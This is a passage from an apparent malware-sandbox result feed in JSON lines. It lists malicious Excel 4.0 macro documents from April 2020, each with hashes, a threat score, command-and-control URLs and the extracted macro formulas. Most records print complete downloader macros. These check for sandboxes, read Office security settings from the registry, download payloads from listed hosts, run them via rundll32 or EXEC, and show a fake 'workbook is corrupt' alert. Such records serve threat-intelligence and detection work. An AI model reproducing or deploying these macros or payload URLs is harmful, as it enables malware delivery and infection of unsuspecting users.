corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YIkbOHepAm\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6994c3665235834d9ae21c5c9c308018060411432423015a4a1f7b6a2aba39e6"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"6994c3665235834d9ae21c5c9c308018060411432423015a4a1f7b6a2aba39e6","filesize":104448,"md5":"0f5969c0baa6341c1d598610f702364c","sha1":"56de07a5037b65e41e5d1270c3e4eecb9caa5457","sha256":"6994c3665235834d9ae21c5c9c308018060411432423015a4a1f7b6a2aba39e6","sha512":"506d50c89e8c98bd576504df76584a7f8be29c21b990437a6ae7738a7b0755dc55c44647d2772ebbfc2bdb17ddfcabd602ecf553322c4882474d8932eb666dfd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6994c3665235834d9ae21c5c9c308018060411432423015a4a1f7b6a2aba39e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9sB8BqrRMz\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"699873ab5573d0ace6141fdd7c034b79f18f3ca59db6f8e0e9414903b9586360"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"699873ab5573d0ace6141fdd7c034b79f18f3ca59db6f8e0e9414903b9586360","filesize":228864,"md5":"92274ccc88a88148da0832a6b3d92476","sha1":"b7f90b87248682c5882a5b0970d6f326da0cb70c","sha256":"699873ab5573d0ace6141fdd7c034b79f18f3ca59db6f8e0e9414903b9586360","sha512":"a8c8dde73ea5350fc86e0cd3d3b119c389aa53c2f38f2ed86e6ebb0ec3af29dae302204c7bc1aba137623221e2db780d61115413d08aba6d5e1e118a30ca3966","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"699873ab5573d0ace6141fdd7c034b79f18f3ca59db6f8e0e9414903b9586360.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8e71KU2EWr\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"69b65475510a8407a036c332a80a31133cf04d96114c56b90cc31b56d96efee0"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"69b65475510a8407a036c332a80a31133cf04d96114c56b90cc31b56d96efee0","filesize":206336,"md5":"d640ad2436a0c95ebf2deeb6f09d1341","sha1":"71da556f908299bbb19c5b56c33ada62b5f1c289","sha256":"69b65475510a8407a036c332a80a31133cf04d96114c56b90cc31b56d96efee0","sha512":"b897da2aa908cf4019a6b47da97a3c70c25209ef46327f25d45ce76936285cc12930d39dec0775d2732ab427bd3174e177074b225136f795110c28cda074f3c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"69b65475510a8407a036c332a80a31133cf04d96114c56b90cc31b56d96efee0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3ZPqsaT0fJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"69b6765a7d9e3079a572bebfe42a8de42dc751f3a9303a60fe32bc6447018ddf"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"69b6765a7d9e3079a572bebfe42a8de42dc751f3a9303a60fe32bc6447018ddf","filesize":113664,"md5":"ff40f6c0128b0aceb240321f25b59a02","sha1":"8d1c26f8dd7b4f954b9ba29f0c8d82a533e786ad","sha256":"69b6765a7d9e3079a572bebfe42a8de42dc751f3a9303a60fe32bc6447018ddf","sha512":"8cf96f7defdba8e76875436c7e4fcadb7cc5e4dbd34297967000b364de15b2034a56f860db2e44809fcf06c5c07b8070e57d3e836ac8f0d4311f9446f571bc3d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"69b6765a7d9e3079a572bebfe42a8de42dc751f3a9303a60fe32bc6447018ddf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"obLquLgN0H\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"69b7054252f73fb94102379b1de7cfe3c741bc118057a3d27a50fd819a692899"},"analysis":{"reported":"2020-04-09T16:16:51Z","score":10},"files":[{"filename":"69b7054252f73fb94102379b1de7cfe3c741bc118057a3d27a50fd819a692899","filesize":212992,"md5":"7384d7520eab0ae53b8a93e348c36691","sha1":"458f3577788e15f186d1aa48087f6b56931e06a5","sha256":"69b7054252f73fb94102379b1de7cfe3c741bc118057a3d27a50fd819a692899","sha512":"fd01f83fd3e2f0759e44bbde087b61244112104c2d15c3802dc6e12962dc9ed89e9d268429d7a4820a9d66c9ff1ab6bb5c5024fe2a5e93e96ab5cfb06e31013c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"69b7054252f73fb94102379b1de7cfe3c741bc118057a3d27a50fd819a692899.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BMyh0E05Yc\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"69bdf31dbb674797e2286d1f145c1efb6a188550fe80e020241ceb5ae6ac6fba"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"69bdf31dbb674797e2286d1f145c1efb6a188550fe80e020241ceb5ae6ac6fba","filesize":141824,"md5":"0b176c4f5e862d3aa45df65eba817a1f","sha1":"306bf95d92ce6fd82a402ab667123ff0f84fd818","sha256":"69bdf31dbb674797e2286d1f145c1efb6a188550fe80e020241ceb5ae6ac6fba","sha512":"ed2bacd3f950b79aafcf1455c4b87026bb8081962ff065a0d06d57011be0d97ef5f5c90421103e78ac2d167e1df06ad60f03f6d1888bcf5bc73791464129f042","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"69bdf31dbb674797e2286d1f145c1efb6a188550fe80e020241ceb5ae6ac6fba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"1W439pBY2N\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"69dca4f5175437129beeca5b739e9679c98501b373a4d9ff4a6f7543ede2a4f3"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"69dca4f5175437129beeca5b739e9679c98501b373a4d9ff4a6f7543ede2a4f3","filesize":170496,"md5":"abf34a3937139077fea92dff18d4c3b5","sha1":"9355c54c03ad716e3fa4a13f7871820109ce4f56","sha256":"69dca4f5175437129beeca5b739e9679c98501b373a4d9ff4a6f7543ede2a4f3","sha512":"4eb46793a6a50a33bc4fdfb53ee1bd5944441679d5f4c367d8e3433c74afe82ee72fa375264cd6f59ae34d151abcb29a95cffc1f7e24309aff0ed1fc944c82f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"69dca4f5175437129beeca5b739e9679c98501b373a4d9ff4a6f7543ede2a4f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WdLnKMK1fj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"69e4f5318e274b63ca91e12a370b06b50222224587f7eca39976b01c1c6b3de8"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"69e4f5318e274b63ca91e12a370b06b50222224587f7eca39976b01c1c6b3de8","filesize":142848,"md5":"50ef3b12299f44b09846204a4e303cc1","sha1":"df04ec427d7a3a142b70043b3d8579eeec1326e4","sha256":"69e4f5318e274b63ca91e12a370b06b50222224587f7eca39976b01c1c6b3de8","sha512":"6f285b295458db130bae99ac3732916d921a833e8c017308050a31aa12e08427de83f6f72d5fa51452d580ed78e3b22328a5e5ad4443fb403d3e3ffe3da4011c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"69e4f5318e274b63ca91e12a370b06b50222224587f7eca39976b01c1c6b3de8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"gsn1jpYXti\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a06afac805ebe29e4c990a810186050c6748e0220f9adccb030a7eb9e717b3a"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a06afac805ebe29e4c990a810186050c6748e0220f9adccb030a7eb9e717b3a","filesize":182784,"md5":"24b02d31ea18d5c888f39a083c755fa5","sha1":"5ef42ba6130cb58e4d305235ce80ffaecdaf3d79","sha256":"6a06afac805ebe29e4c990a810186050c6748e0220f9adccb030a7eb9e717b3a","sha512":"4eaa61bf74b9e1f350c8e1cbaeca77be1db29767a592f45ef8fe6cc8e40169d10f0b13b7c29643fa26c95aa2f8595e71c73df80b0cfa20fff35119ce0487a555","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a06afac805ebe29e4c990a810186050c6748e0220f9adccb030a7eb9e717b3a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a0886bb7d42fe1a49d3a873aed0b5482ed8793ecb95a2f44aa596db2ade3b9e"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a0886bb7d42fe1a49d3a873aed0b5482ed8793ecb95a2f44aa596db2ade3b9e","filesize":185344,"md5":"02bb80469fe5afdf909b93a59cc79849","sha1":"683d48a1a02e767c669ae90249dc98f4d8a6fade","sha256":"6a0886bb7d42fe1a49d3a873aed0b5482ed8793ecb95a2f44aa596db2ade3b9e","sha512":"dcf6f29421d46c3d71e44be222e8970f1092cc08d432476e281a42be91dca3725061bcc906c512bb3f43bac160bf3f990571f4af8c59eef59dc42b8b09571935","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a0886bb7d42fe1a49d3a873aed0b5482ed8793ecb95a2f44aa596db2ade3b9e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a1156991b8764434b15d7ef7d68eed160d3e6d74616e424390d103fbe5c10a4"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a1156991b8764434b15d7ef7d68eed160d3e6d74616e424390d103fbe5c10a4","filesize":209920,"md5":"e73a46978690a7910a5607f3b6dc5bc3","sha1":"b9caa39e5da4c42f14199f65867d9f8e595353fd","sha256":"6a1156991b8764434b15d7ef7d68eed160d3e6d74616e424390d103fbe5c10a4","sha512":"af3edf8c6985ce168830e0ffe14b1f2c894a3b1a75e5e669bdfc97bb3d449d6a35218e0c0dcf78ec969546baa573e1496bf0e74b2cbb629d7209005d186666e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a1156991b8764434b15d7ef7d68eed160d3e6d74616e424390d103fbe5c10a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"q8g33aQN64\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a1611504a65cb56462a792a5736a52a75c2f5864350fd91b02f3d035817c072"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a1611504a65cb56462a792a5736a52a75c2f5864350fd91b02f3d035817c072","filesize":147968,"md5":"4274ef1e8c449a956df1f570ff129aff","sha1":"1fb16e54d9685608d10fd0a4c0f0c9fdbc7a7906","sha256":"6a1611504a65cb56462a792a5736a52a75c2f5864350fd91b02f3d035817c072","sha512":"a881f871022d9ebb03b320c63de9254c64447cc3f3b0c2e4649b2857b122e8f2c9b7e31872620d6796d673842f7d12e60d2f57fb050c2f5ed49539b046574d01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a1611504a65cb56462a792a5736a52a75c2f5864350fd91b02f3d035817c072.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"bGSCdckVxY\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a3d361414c185a0a66bf4287b0a0f2054b715c68b8c470501b4669a7ae992f8"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a3d361414c185a0a66bf4287b0a0f2054b715c68b8c470501b4669a7ae992f8","filesize":185344,"md5":"e28f3d6356cf26085fa55edf4c4505ef","sha1":"8d8a460e0a2e9f2d101a2cfb3abf2ac1b65acc5f","sha256":"6a3d361414c185a0a66bf4287b0a0f2054b715c68b8c470501b4669a7ae992f8","sha512":"73c316f8f789275ee41a82c4f36d3bd91191286c432f928cba78c942db895c211ff81a0677591d7472595171906e9767a81e97295eeea78ec3cc2fd0185f43f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a3d361414c185a0a66bf4287b0a0f2054b715c68b8c470501b4669a7ae992f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6a4b0fae07242d74b0ea07e55e574983235cb3ccc23950e728dcf33be7bdc1fc"},"analysis":{"reported":"2020-04-09T16:16:52Z","score":10},"files":[{"filename":"6a4b0fae07242d74b0ea07e55e574983235cb3ccc23950e728dcf33be7bdc1fc","filesize":113664,"md5":"20a47e4f62480eb8379a5023918e48fe","sha1":"c6a8311c7b16fb94f92fb5d03c89aa6de5eacb93","sha256":"6a4b0fae07242d74b0ea07e55e574983235cb3ccc23950e728dcf33be7bdc1fc","sha512":"449483f2c0e994ee84a62ec48c66bc6f0149c51bd4caf64715bf0f22b339674bf6792db7f260c08ddf6649a15ee0d61acb382a5a892b4b1df528cb0c44558dd0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6a4b0fae07242d74b0ea07e55e574983235cb3ccc23950e728dcf33be7bdc1fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"Q0JUPRDuHC\",TRUE)"}}}]}
